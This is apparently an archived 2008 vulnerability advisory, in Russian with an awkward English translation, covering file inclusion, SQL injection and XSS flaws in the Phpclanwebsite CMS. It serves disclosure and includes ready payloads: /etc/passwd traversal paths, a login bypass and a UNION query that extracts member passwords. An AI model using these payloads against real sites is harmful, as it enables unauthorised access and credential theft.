Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21050
HistoryDec 18, 2008 - 12:00 a.m.

Многочисленные уязвимости в Phpclanwebsite <= 1.23.3 Fix Pack #5

2008-12-1800:00:00
vulners.com
23

Многочисленные уязвимости в Phpclanwebsite <= 1.23.3 Fix Pack #5

Описание:
Были обнаружены многочисленные уязвимости в CMS Phpclanwebsite версии 1.23.3
Fix Pack #5 и ниже.

  1. Множественные уязвимости типа "Чтение произвольных файлов" (File
    Including)

Уязвимость существует по причине того, что возможен прямой доступ к
некоторым файлам, в обход логики работы приложения.
Это дает возможность переопределить внутренние переменные, которые
передаются в качестве аргументов в функцию include().
Примеры уязвимых файлов:
/theme/superchrome/box.php?boxname=…/…/…/…/…/etc/passwd%00
/phpclanwebsite/footer.php?theme=…/…/…/…/…/etc/passwd%00
и т.д.

Примечание:
Для эксплуатации уязвимости требуются следующие настройки PHP:
register_globals=On и magic_quotes_gpc=Off

  1. Множественные уязвимости типа "Выполнение произвольных SQL-запросов" (SQL
    Injection)

Приложением повсеместно не проверяются переменные, передаваемые со стороны
пользователя. Это позволяет выполнять произвольные SQL-запросы.
Примеры уязвимых файлов:
SQL Injection (insert) -
/index.php?page='SQL
SQL Injection (delete) -
/index.php?page=processforms&ok=1&SP=1&form_id=2
, где "form_id" идентификатор удаляемого пользователя
SQL Injection (select) -
/index.php?page=login
POST:pcwlogin='SQL&pcw_pass='SQL

/index.php?page=login
POST:pcwlogin=1'+OR+1=1–&pcw_pass=1

SQL Injection (select) -
/index.php?page=downloads&func=search
POST:searchvalue='SQL&whichfield=SQL

/index.php?page=downloads&func=search
POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members–
и т.д.

Примечание:
Для эксплуатации всех уязвимостей SQL Injection, кроме уязвимости в
параметре "whichfield", требуются отключенный magic_quotes_gpc.

  1. Множественные уязвимости типа "Межсайтовое выполнение сценариев"
    (Cross-site Scripting, XSS)

Приложением повсеместно не проверяются переменные, передаваемые со стороны
пользователя. Это позволяет выполнять произвольный код в контексте браузера
пользователя.
Примеры уязвимых файлов:
/index.php?page='><script>alert('XSS')</script>
и др.


Phpclanwebsite <= 1.23.3 Fix Pack #5 (File Including/SQL/XSS) Multiple
Remote Vulnerabilities

The description:
The set vulnerability in CMS Phpclanwebsite versions 1.23.3 Fix Pack #5 and
more low Was revealed.

  1. Multiple File Including Vulnerabilities

Vulnerability exists for the reason that direct access to some files, around
logicians of work of the appendix is possible.
It gives the chance to redefine internal variables which are transferred as
arguments in function include ().
Examples of vulnerable files:
/theme/superchrome/box.php?boxname=…/…/…/…/…/etc/passwd%00
/phpclanwebsite/footer.php?theme=…/…/…/…/…/etc/passwd%00
etc

The note:
For vulnerability operation the following options PHP are required:
register_globals=On and magic_quotes_gpc=Off

  1. Multiple SQL Injection Vulnerabilities

The appendix everywhere does not check the variables transferred from
outside of the user. It allows to carry out any SQL Injection.
Examples of vulnerable files:
SQL Injection (insert) -
/index.php?page='SQL
SQL Injection (delete) -
/index.php?page=processforms&ok=1&SP=1&form_id=2
, where "form_id" the identifier of the deleted user
SQL Injection (select) -
/index.php?page=login
POST:pcwlogin='SQL&pcw_pass='SQL

/index.php?page=login
POST:pcwlogin=1'+OR+1=1–&pcw_pass=1

SQL Injection (select) -
/index.php?page=downloads&func=search
POST:searchvalue='SQL&whichfield=SQL

/index.php?page=downloads&func=search
POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members–
etc

The note:
For operation of all SQL Injection vulnerabilities, except vulnerability in
parametre "whichfield", are required disconnected magic_quotes_gpc.

  1. Multiple Cross-site Scripting Vulnerabilities

The appendix everywhere does not check the variables transferred from
outside of the user. It allows to carry out any code in a context of a user
browser.
Examples of vulnerable files:
/index.php?page='><script>alert('XSS')</script>
etc